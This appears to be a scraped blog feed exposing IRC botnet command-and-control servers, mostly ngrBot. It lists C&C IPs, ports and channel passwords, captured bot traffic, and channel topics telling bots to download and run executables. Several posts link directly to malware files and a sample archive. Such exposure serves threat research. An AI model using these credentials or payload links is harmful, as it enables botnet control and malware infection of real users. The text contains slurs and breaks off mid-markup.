0 0 :ihsboxr<br />PONG :C03D3650<br />JOIN #paradise klash<br /><br />Now talking in #paradise<br />Topic On: [ #paradise ] [ .dl http://dc460.4shared.com/download/Vev8KBwQ/insomnia.exe?tsid=20111205-151346-2b5ec481 ]<br />Topic By: [ WILLY ]<br />Modes On: [ #paradise ] [ +smntu ]<br />Nick: WILLY is now known as [n{US|VI-64a}ndksjax]<br /><br />Topic: n{US|VI-64a}ndksjax sets topic [.dl http://dc465.4shared.com/download/Co9oUD6m/113bexe.exe?tsid=20111205-194436-d93b71b3]<br />@(n{US|VI-64a}ndksjax) .rc<br />@(n{US|VI-64a}ndksjax) .rc<br /><br />Just in case insomnia.exe is deleted from 4shared here another link:<br /><a href="http://8d220988.urlbeat.net/" target="_blank">Download</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6053086175416298741?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-72207476458234448662011-12-05T00:39:00.000+01:002011-12-05T00:39:42.529+01:00curado.ru(ngrBot hosted in Germany Berlin Intergenia Ag)Remote Host Port Number<br />188.138.0.84 1686 PASS koka25<br />199.15.234.7 80<br />77.74.199.61 80<br /><br />NICK n{US|XPa}ezhvyeo<br />USER ezhvyeo 0 0 :ezhvyeo<br />JOIN #soaa koka25<br />JOIN #US<br />PRIVMSG #soaa :[d="http://77.74.199.61/111222.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0<br /><br /> * The data identified by the following URLs was then requested from the remote web server:<br /> o http://api.wipmania.com/<br /> o http://77.74.199.61/111222.exe<br /><br />hosting infos:<br />http://whois.domaintools.com/188.138.0.84<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7220747645823444866?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-62128842459931546382011-12-02T13:48:00.003+01:002011-12-02T23:19:01.595+01:0097.74.192.231(ngrBot hosted in United States Godaddy.com Inc)Remote Host Port Number<br />199.15.234.7 80<br />97.74.192.231 8000 PASS passwd<br /><br />NICK n{US|XPa}cmeoubk<br />USER cmeoubk 0 0 :cmeoubk<br />JOIN #b0ts ngrBot<br /><br />hosting infos:<br />http://whois.domaintools.com/97.74.192.231<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6212884245993154638?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-16065786903797068162011-12-02T12:49:00.000+01:002011-12-02T12:49:10.236+01:00178.63.193.161(irc botnet hosted in Germany Gunzenhausen Hetzner Online Ag)Remote Host Port Number<br />178.63.193.161 6667<br />199.15.234.7 80<br /><br />NICK New{US-XP-x86}1062264<br />USER 1062264 "" "1062264" :1062264<br />MODE New{US-XP-x86}1062264 +iMm<br />JOIN #Boss<br />PONG :irc.foonet.com<br /><br /><br />hosting infos:<br />http://whois.domaintools.com/178.63.193.161<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1606578690379706816?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-30834642060684718302011-11-30T20:29:00.000+01:002011-11-30T20:29:05.970+01:00208.67.252.82(irc botnet hosted in United Kingdom Pelican Helpdesk Ltd)Remote Host Port Number<br />208.67.252.82 2345<br /><br />NICK New[USA|00|P|00209]<br />PRIVMSG #!loco! :[M]: Thread Disabled.<br />PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.<br />USER XP-4688 * 0 :COMPUTERNAME<br />MODE New[USA|00|P|00209] -ix<br />JOIN #!loco!<br />PONG 22 MOTD<br /><br />hosting infos:<br />http://whois.domaintools.com/208.67.252.82<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3083464206068471830?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-27333681840704682012011-11-29T19:06:00.000+01:002011-11-29T19:06:41.859+01:00tretr23.com(JACK LOADER hosted in Romania Iasi Prime Telecom Srl)Another http malware spreading around<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-t6rkMdlz93g/TtUeEiOrvjI/AAAAAAAAAIw/NkP4tcflLlM/s1600/JACK+LOADER.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://1.bp.blogspot.com/-t6rkMdlz93g/TtUeEiOrvjI/AAAAAAAAAIw/NkP4tcflLlM/s320/JACK+LOADER.png" width="320" /></a></div><br /><br /><br /><br />Panel:http://188.247.135.32/signin.php<br /><br />Network Activity:<br /><br />Host Name IP Address<br />tretr23.com <br />tretr23.com 188.247.135.32<br />Download URLs<br />http://188.247.135.32/list.php?c=B4AC885F94224AE64DAAC6EE0346C213D07DB5860B2E69F2DCE5CA8B5FF9F6DADFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5854372&v=2&t=0,4527399 (tretr23.com)<br />Outgoing connection to remote server: tretr23.com TCP port 80<br /><br />Host Name IP Address<br />ytreytre.com <br />ytreytre.com 94.63.240.235<br />Download URLs<br />http://94.63.240.235/temp/3431.exe?t=0,4103815 (ytreytre.com)<br />Outgoing connection to remote server: ytreytre.com TCP port 80<br /><br />Host Name IP Address<br />tretr23.com <br />tretr23.com 188.247.135.32<br />Download URLs<br />http://188.247.135.32/sn.php?c=908E72969A0A2B8310FA89A6D7AD30F30FAFA09590DF48823B0A0440F15AC399317E2ACCA79B6606350F95F93B056B7127DFFA129EEBCAEFB286A3D4047CB72AC78C1168F6F56CF34A70E59FA34D28F70BFC003D7806787EF741EA8FF01BB5CD8FD7707AACB6CE6E9A299215C6C647DD17E09CB3632482A5762F92FD87313E800800D17D2D1C5D98B380F4A69850EA6A&t=0,5958063 (tretr23.com)<br />Outgoing connection to remote server: tretr23.com TCP port 80<br /><br />exe files:<br />http://vetvetcom.com/tr9.txt<br />http://94.63.240.235/temp/3431.exe<br />http://29315285.tubeviral.com<br />http://b774fafb.theseforums.com<br /><br />hosting infos:<br />http://whois.domaintools.com/188.247.135.32<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2733368184070468201?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com1tag:blogger.com,1999:blog-2690706005301967154.post-32182501101525492962011-11-29T17:49:00.000+01:002011-11-29T17:49:44.213+01:00negro001.com(ngrBot hosted in Seychelles Ideal Solution Ltd)Resolved : [negro001.com] To [193.107.16.131]<br />Resolved : [negro001.com] To [92.241.165.152]<br /><br />Remote Host Port Number<br />199.15.234.7 80<br />92.241.165.152 8782 ircd here<br />193.107.16.131 8782 ircd here<br /><br />NICK [USA|635435]<br />USER 8770 "" "lol" :8770<br />JOIN #moo<br />PONG :Threat-Expert.net<br /><br />NICK {iNF-00-USA-XP-COMP-7188}<br />JOIN #hold nigger<br />PONG Threat-Expert.net<br />USER blaze * 0 :COMP<br /><br />hosting infos:<br />http://whois.domaintools.com/193.107.16.131<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3218250110152549296?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-75354521482302669582011-11-28T23:45:00.000+01:002011-11-28T23:45:18.575+01:00208.67.252.118(irc botnet hosted in United States Buckshot Enterprises Llc)Remote Host Port Number<br />208.67.252.118 2345<br /><br />NICK [USA|00|P|65160]<br />PRIVMSG #!loco! :[M]: Thread Disabled.<br />PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.<br />USER XP-2443 * 0 :COMPUTERNAME<br />MODE [USA|00|P|65160] -ix<br />JOIN #!loco!<br />PONG 22 MOTD<br /><br />hosting infos:<br />http://whois.domaintools.com/208.67.252.118<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7535452148230266958?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-77853536864490782342011-11-27T22:06:00.001+01:002011-11-28T23:05:50.862+01:00www.facebookvideocentral.com(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)Remote Host Port Number<br />213.202.225.40 80<br />213.202.225.48 80<br />74.206.242.164 80<br />46.45.164.166 81 IRCD HERE<br /><br />NICK [N00_USA_XP_8072956]<br />JOIN #c<br />MODE [00_USA_XP_9406831] -ix<br />USER SP2-351 * 0 :COMPUTERNAME<br />PRIVMSG #bs :HTTP SET http://46.45.164.163/cc.exe<br />PRIVMSG #c :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 15 threads.<br />PRIVMSG #c :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 seconds for 0 minutes using 15 threads.<br />PRIVMSG #c :scan; Sequential Port Scan started on 192.168.80.0:445 with a delay of 5 seconds for 0 minutes using 5 threads.<br />PRIVMSG #c :scan; Random Port Scan started on 174.x.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads.<br />NICK [00_USA_XP_9406831]<br />USER SP2-307 * 0 :COMPUTERNAME<br /><br />UPDATE:<br />Remote Host Port Number<br />213.202.225.40 80<br />213.202.225.48 80<br />46.45.164.164 80<br />74.206.242.164 80<br />46.45.164.174 81 ircd here<br /><br />NICK [00_USA_XP_6506493]<br />MODE #t1 -ix<br />PRIVMSG #t1 :download; File download: 152.0KB to: c:\syncapp.exe @ 4.9KB/sec.<br />PRIVMSG #t1 :download; Created process: "c:\syncapp.exe", PID:<br />USER SP2-176 * 0 :COMPUTERNAME<br />MODE [00_USA_XP_6506493] -ix<br />JOIN #t1<br /><br /> * The data identified by the following URLs was then requested from the remote web server:<br /> o http://chillly.ch.ohost.de/aze/azenv.php<br /> o http://bentseather.be.funpic.de/azenv.php<br /> o http://46.45.164.164/cc.exe<br /> o http://www.pr0.net/deny2/azenv.php<br /><br /><br /><br />hosting infos:<br />http://whois.domaintools.com/46.45.164.166<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7785353686449078234?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-86763052243476616642011-11-26T23:47:00.002+01:002011-11-26T23:47:55.307+01:00188.190.96.148(irc botnet hosted in Ukraine Infium Ltd)Remote Host Port Number<br />188.190.96.148 8087 PASS bich99<br />199.15.234.7 80<br /><br />NICK n{US|XPa}mlqlmaj<br />USER mlqlmaj 0 0 :mlqlmaj<br />JOIN #cash bich99<br />JOIN #US<br /><br />hosting infos:<br />http://whois.domaintools.com/188.190.96.148<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8676305224347661664?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-80915258184069930482011-11-26T23:44:00.002+01:002011-11-26T23:44:39.459+01:00178.63.199.34(3vbot hosted in Germany Gunzenhausen Hetzner Online Ag)Remote Host Port Number<br />178.63.199.34 6667<br />199.15.234.7 80<br /><br />NICK New{US-XP-x86}4687226<br />USER 4687226 "" "4687226" :4687226<br />MODE New{US-XP-x86}4687226 +iMm<br />JOIN #|3vbot|#<br />PONG :irc.priv8net.com<br /><br />hosting infos:<br />http://whois.domaintools.com/178.63.199.34<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8091525818406993048?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-26254105959257576652011-11-26T22:57:00.000+01:002011-11-26T22:57:33.488+01:00java.alb-team.com(linux bots hosted in United States Ft. Lee Righthosting.com)albanian lamers hosting rfi bots for ddos<br /><br />var $config = array("server"=>"java.alb-team.com", <br /> "port"=>4242, <br /> "pass"=>"", //<br /> "prefix"=>"", <br /> "maxrand"=>7, <br /> "chan"=>"#bote", <br /> "key"=>"142536", //<br /> "modes"=>"-x+i", <br /> "password"=>"bomp", //<br /> "trigger"=>"!say@", <br /> "hostauth"=>"*" // * <br /><br />hosting infos:<br />http://whois.domaintools.com/66.78.3.76<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2625410595925757665?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com1tag:blogger.com,1999:blog-2690706005301967154.post-19542936245328765342011-11-26T00:44:00.000+01:002011-11-26T00:44:05.177+01:0087.251.154.156(ngrBot hosted in Russian Federation Moscow Anders Telecom Ltd)Remote Host Port Number<br />199.15.234.7 80<br />87.251.154.156 1890 PASS r00l<br /><br />NICK n{US|XPa}mqecvfh<br />USER mqecvfh 0 0 :mqecvfh<br />JOIN #bots r00l<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1954293624532876534?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-64407412020540206442011-11-25T21:58:00.002+01:002011-12-10T22:20:51.255+01:00latincrew.biz(ngrBot hosted in Russian Federation Moscow Oao Webalta)Resolved : [latincrew.biz] To [92.241.165.124]<br />Other domains used to control bots:<br /><br />xsstorm.com 87.255.51.229 <br />latincrew.biz 92.241.165.124<br />gu1d3sh3n.cz.cc 178.238.36.17<br /><br />92.241.165.124 1234 PASS xxx<br /><br /><br />NICK NEW-[USA|00|P|01507]<br />USER XP-5713 * 0 :COMPUTERNAME<br />MODE NEW-[USA|00|P|01507] -ix<br />JOIN #!nw! test<br />PONG 22 MOTD<br /><br />exe file:<br /><a href="http://b1e89f16.ultrafiles.net/" target="_blank">Download</a><br /><a href="http://www.multiupload.com/MF2SUD71U5" target="_blank">Download </a><br /><br />UPDATE:<br />64.202.107.109 1234<br /><br />Now talking in #!nw!<br />Topic On: [ #!nw! ] [ .g.f http://hotfile.com/dl/135879883/fa2041b/hl.exe c:\windows\temp\hl.exe 1 ]<br />Topic By: [ p ]<br /><br />UPDATE:<br />Remote Host Port Number<br />199.15.234.7 80<br />64.202.107.109 1234 PASS priv9<br /><br />NICK n{US|XP}uoahqtm<br />USER uoahqtm 0 0 :uoahqtm<br />JOIN #ngr HELO<br /><br />hosting infos:<br />http://whois.domaintools.com/92.241.165.124<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6440741202054020644?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-38676320039310463652011-11-25T21:14:00.001+01:002011-12-04T20:56:33.821+01:00xD.a7aneek.net(80-100k ngrBotnet hosted in France Paris Gandi)Same lamer with big net and still hosting with Gandi.net<br /><br />Resolved : [xD.a7aneek.net] To [92.243.17.156]<br />Resolved : [xD.a7aneek.net] To [92.243.25.164]<br />Resolved : [xD.a7aneek.net] To [92.243.0.109]<br />Resolved : [xD.a7aneek.net] To [92.243.27.72]<br />Resolved : [xD.a7aneek.net] To [92.243.10.12]<br /><br />Other domain names used to control bots:<br />xD.0dayx.com<br />appupdate.org<br />xD.0days.me<br /><br /><br />92.243.10.12 5900 PASS ngrBot<br />92.243.0.109 5900 PASS ngrBot<br />92.243.27.72 5900 PASS ngrBot<br />92.243.17.156 5900 PASS ngrBot<br />92.243.25.164 5900 PASS ngrBot<br /><br />NICK n{US|XPa}vowobev<br />USER vowobev 0 0 :vowobev<br />JOIN ##Redrm-002## redem<br />JOIN #new<br />JOIN #SPp,#DLx,#UP<br /><br />Now talking in ##Redrm-002##<br />Topic On: [ ##Redrm-002## ] [ !m on !j #SPp,#DLx,#UP !j -c UA,UKR #vnc ]<br />Topic By: [ x3x ]<br />[18:53] [x3x:##redrm-002## VERSION]<br /><br />the noob now version everyone who join his botnet and autoglines them if theyre not bots <br /><br />exe file used to spread:<br /><a href="http://b0336665.urlbeat.net/" target="_blank">Download</a><br /><a href="http://www.multiupload.com/72J5Y4CNKH" target="_blank">Download </a><br /><br />UPDATE:<br />Resolved : [xD.0days.me] To [92.243.27.72]<br />Resolved : [xD.0days.me] To [92.243.25.164]<br />Resolved : [xD.0days.me] To [92.243.10.12]<br />Resolved : [xD.0days.me] To [217.70.189.146]<br />Resolved : [xD.0days.me] To [92.243.0.109]<br /><br />Now talking in ##Redrm-002##<br />Topic On: [ ##Redrm-002## ] [ !m on !j #SPp,#DLx,#UP !j -c UA,UKR #vnc ]<br />Topic By: [ _Magic ]<br /><br />Now talking in #sPp<br />Topic On: [ #sPp ] [ !mod usbi on ]<br />Topic By: [ _Magic ]<br /><br />Now talking in #vnc<br />Topic On: [ #vnc 12] [ !mod pdef off !NAZEL http://hotfile.com/dl/134087331/ae699bf/yavncc.jpeg 291BFC99016ED4647862AEB896F741D1 -n ]<br />Topic By: [ _Magic ]<br /><br />hosting infos:<br />http://whois.domaintools.com/92.243.25.164<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3867632003931046365?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-11555997299652891032011-11-24T21:19:00.000+01:002011-11-24T21:19:13.349+01:00213.175.194.128(ngrBot hosted in United Kingdom Durham Eukhost Ltd)Remote Host Port Number<br />199.15.234.7 80<br />213.175.194.128 8000 PASS ngrBot<br /><br />NICK n{US|XPa}lomkpuv<br />USER lomkpuv 0 0 :lomkpuv<br />JOIN ##putotimador## ngrBot<br /><br />hosting infos:<br />http://whois.domaintools.com/213.175.194.128<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1155599729965289103?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-75987199400058671782011-11-24T19:54:00.001+01:002011-12-17T21:10:20.838+01:00shoe.mrkva.su(ngrBot hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)same guy as update.jebac.net he keep changing domains lol<br /><br />shoe.mrkva.su 212.7.214.129<br /><br />Remote Host Port Number<br />199.15.234.7 80<br />212.7.214.129 2087 PASS carmex<br /><br />UPDATE:<br />Resolved : [shoe.mrkva.su] To [212.7.214.3]<br /><br />Server: 212.7.214.3:2087 PASS carmex<br /> Server Password: <br /> Username: ztaisun<br /> Nickname: n{DE|XPa}ztaisun<br /> Channel: #!s! (Password: carmex) <br /> Channeltopic: :!mod usbi on<br /><br /><a href="http://cce29c59.whackyvidz.com/" target="_blank">Download</a><br /><a href="http://www.multiupload.com/WPFBCZI8GI" target="_blank">Download </a><br /><br />hosting infos:<br />http://whois.domaintools.com/212.7.214.129<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7598719940005867178?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-19660019557738354512011-11-23T23:43:00.000+01:002011-11-23T23:43:03.930+01:0067.202.92.95(irc botnet hosted in United States Steadfast Networks)Remote Host Port Number<br />67.202.92.95 2345<br /><br />NICK New[USA|00|P|58651]<br />PRIVMSG #!loco! :[M]: Thread Disabled.<br />PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.<br />USER XP-8084 * 0 :COMPUTERNAME<br />MODE New[USA|00|P|58651] -ix<br />JOIN #!loco!<br />PONG 22 MOTD<br /><br /><br />hosting infos:<br />http://whois.domaintools.com/67.202.92.95<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1966001955773835451?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-63278796756627800982011-11-22T22:50:00.000+01:002011-11-22T22:50:24.834+01:00111mb malware samplesFull of bankers,irc bots,rats<br />have fun <br /><br /><a href="http://3393f9bc.theseforums.com/" target="_blank">Download</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6327879675662780098?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-75877534506064358462011-11-22T20:46:00.000+01:002011-11-22T20:46:18.071+01:00212.7.214.6(ngrBot hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)Remote Host Port Number<br />212.7.214.6 2345<br /><br />NICK New[USA|00|P|78577]<br />PRIVMSG #!loco! :[M]: Thread Disabled.<br />PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.<br />USER XP-6642 * 0 :COMPUTERNAME<br />MODE New[USA|00|P|78577] -ix<br />JOIN #!loco!<br />PONG 22 MOTD<br /><br />hosting infos:<br />http://whois.domaintools.com/212.7.214.6<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7587753450606435846?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-72415591723868878792011-11-21T20:17:00.000+01:002011-11-21T20:17:57.383+01:00mlsksfkajsfsa.com(ngrBot hosted in Netherlands Amsterdam Dediserv Dedicated Servers Sp. Z O.o)Domains used to control bots:<br />mlsksfkajsfsa.com 212.7.203.231<br />scfafsbfs.com NONE<br />scfafsbfs.com.local NONE<br />djesibonajeb.com NONE<br />djesibonajeb.com.local NONE<br /><br />Resolved : [mlsksfkajsfsa.com] To [212.7.203.231]<br /><br />Remote Host Port Number<br />173.245.61.83 80<br />199.15.234.7 80<br />212.7.203.231 1866 PASS secret<br /><br />PRIVMSG #!x! :[DNS]: Blocked 1310 domain(s) - Redirected 0 domain(s)<br />NICK n{US|XPa}hkiqwul<br />USER hkiqwul 0 0 :hkiqwul<br />JOIN #!x! secret<br />PRIVMSG #!x! :[MSN]: Updated MSN spread interval to "3"<br />PRIVMSG #!x! :[MSN]: Updated MSN spread message to ":) hahahahahaha! http://www.facebook.picnicfood.dk/Facebook-pic-68595-JPEG"<br />PRIVMSG #!x! :[HTTP]: Updated HTTP spread interval to "3"<br />PRIVMSG #!x! :[HTTP]: Updated HTTP spread message to ";) hehehe! http://www.facebook.picnicfood.dk/Facebook-pic-93181-JPEG"<br /><br />hosting infos:<br />http://whois.domaintools.com/212.7.203.231<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7241559172386887879?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-10481805604967627942011-11-20T22:15:00.000+01:002011-11-20T22:15:57.695+01:00204.45.122.66(irc botnet hosted in United States Chicago Fdcservers.net)Remote Host Port Number<br />204.45.122.66 6061 PASS m3l0s1p0y0<br /><br />MODE {M3|USA|00|P|00029} -ixd<br />JOIN ####bmw-m3# n4d4d4d4m3<br />PRIVMSG ####bmw-m3# :<br />Activado: enviando .<br />PONG Tan.Sec.CSC.Com<br />NICK {M3|USA|00|P|00029}<br />USER XP-4625 * 0 :COMPUTERNAME<br /><br />Now talking in ####bmw-m3#<br />Topic On: [ ####bmw-m3# ] [ -sprmsg Lo hermoso merece ser visto! para muestra un boton http://www.softwarearpbolivar.com/fotografias/paisajes/DSC-00572.JPG ]<br />Topic By: [ Coupe ]<br />Modes On: [ ####bmw-m3# ] [ +smntMu ]<br /><br />hosting infos:<br />http://whois.domaintools.com/204.45.122.66<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1048180560496762794?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-48477315280003148372011-11-20T21:15:00.001+01:002011-11-20T21:41:01.978+01:00ngr.dns02.ns2.name(7k ngrBots hosted in United States Franklin Wisconsin Cyberlynk Network Inc)DNS Requests:<br /><br />api.wipmania.com 199.15.234.7<br /><br />niidea.net 66.96.160.142<br /><br />ngr.hostname.ns1.name NONE<br /><br />ngr.hostname.ns1.name.local NONE<br /><br />ngrnd.scrapping.cc NONE<br /><br />ngrnd.scrapping.cc.local NONE<br /><br />ngrnd.zapto.org 199.102.236.233<br /><br />ngr.dns02.ns2.name 199.102.236.233<br /><br />Remote Host Port Number<br />199.102.236.233 1590 PASS 44640151<br />199.15.234.7 80<br /><br />Local users: Current Local Users: 7446 Max: 12732<br />Global users: Current Global Users: 7446 Max: 7485<br /><br />NICK n{US|XPa}ufcvtzo<br />USER ufcvtzo 0 0 :ufcvtzo<br />PONG :C475B42B<br />JOIN #rndbot zrag<br /><br />Now talking in #rndbot<br />Modes On: [ #rndbot ] [ +smtMu ]<br />(RnD) &up http://swagropecuaria.com.ar/google.exe 762EF3564F80E8FE565A8B1431E2FCB0<br />(RnD) &up http://ctcontact.co/google.exe 762EF3564F80E8FE565A8B1431E2FCB0<br />(RnD) &up http://salkantaytrailperu.com/google.exe 762EF3564F80E8FE565A8B1431E2FCB0<br /><br />hosting infos:<br />http://whois.domaintools.com/199.102.236.233<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4847731528000314837?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-54334477237377257022011-11-18T12:19:00.000+01:002011-11-18T12:19:36.142+01:00irc.selocell.com(irc botnet hosted in United States Monstercommerce Llc)Remote Host Port Number<br />206.188.205.6 7985<br /><br />NICK KCA[XP][3][55][45875][67470]<br />PRIVMSG KCA[XP][3][55][45875][67470] :<br />PING 1321617332<br />NOTICE KCA[XP][3][55][45875][67470] :<br />NICK KCA[XP][3][55][860][56512]<br />USER KCA "" "irc.selocell.com" :Coded<br />y KCA<br />USERHOST KCA[XP][3][55][860][56512]<br />MODE KCA[XP][3][55][860][56512] +iR-x<br />JOIN #XP +a+s+d+f<br />MODE #XP<br />PRIVMSG #XP :<br />2 Topic Okuma Aktif<br />USERHOST KCA[XP][3][55][45875][67470]<br />MODE KCA[XP][3][55][45875][67470] +iR-x<br /><br /><br />Now talking in #XP<br />Topic On: [ #XP ] [ ]<br />Topic By: [ tr0j3n ]<br /><br />hosting infos:<br />http://whois.domaintools.com/206.188.205.6<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5433447723737725702?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-16308590087997081532011-11-17T19:06:00.000+01:002011-11-17T19:06:47.731+01:00gl0x.no-ip.info(irc botnet hosted in United States San Jose Cox Communications)Server:24.250.173.11:5822<br />Nick: N-[AUT-XP-31375]<br />Username: 5130<br />Joined Channel: #a<br /><br />hosting infos:<br />http://whois.domaintools.com/24.250.173.11<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1630859008799708153?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-89255298960248454042011-11-17T17:01:00.000+01:002011-11-17T17:01:16.438+01:00205.234.231.33(irc botnet hosted in United States Chicago Hostforweb Inc)Remote Host Port Number<br />205.234.231.33 2345<br /><br />NICK New[USA|00|P|24306]<br />PRIVMSG #!loco! :[M]: Thread Disabled.<br />PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.<br />USER XP-7448 * 0 :COMPUTERNAME<br />MODE New[USA|00|P|24306] -ix<br />JOIN #!loco!<br />PONG 22 MOTD<br /><br /><br />hosting infos:<br />http://whois.domaintools.com/205.234.231.33<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8925529896024845404?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-40388447029093199782011-11-16T17:19:00.000+01:002011-11-16T17:19:03.300+01:00190.254.18.77(irc botnet hosted in Colombia Colombia Telecomunicaciones S.a. Esp)Remote Host Port Number<br />190.254.18.77 1866<br /><br />NICK n[USA|XP|COMPUTERNAME]icvavry<br />USER hh "" "lol" :hh<br />PONG :25D8DDB6<br />JOIN #!h!<br /><br />hosting infos:<br 